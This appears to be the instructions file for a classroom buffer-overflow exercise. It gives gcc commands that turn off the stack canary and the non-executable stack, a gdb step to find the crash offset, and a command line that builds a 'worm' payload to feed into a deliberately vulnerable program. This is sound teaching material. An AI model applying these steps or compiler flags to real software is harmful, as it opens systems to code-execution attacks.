// Detailed instructions are in make-worm.c, but this will probably work (the -fno-stack-protector and -allow_stack_execute flags switch off the stack canary and the non-executable stack, which is what leaves the exercise binaries overflowable):
gcc -O0 -m32 -fno-stack-protector -Xlinker -allow_stack_execute -o make-worm make-worm.c
gcc -O2 -m32 -fno-stack-protector -Xlinker -allow_stack_execute -o bugins buggy-instrumented.c
gcc -O2 -m32 -fno-stack-protector -Xlinker -allow_stack_execute -o buggy buggy.c
gdb buggy
run < bigstring
get the offset from the crash; it's probably 26 or something like that
./bugins
it will print a command line something like this:
./make-worm 0x94e4cdcb 0xbffff3be 26 64 > worm
If your offset was different from 26, change the 26 in that command line, run it, and then execute this command:
./buggy < worm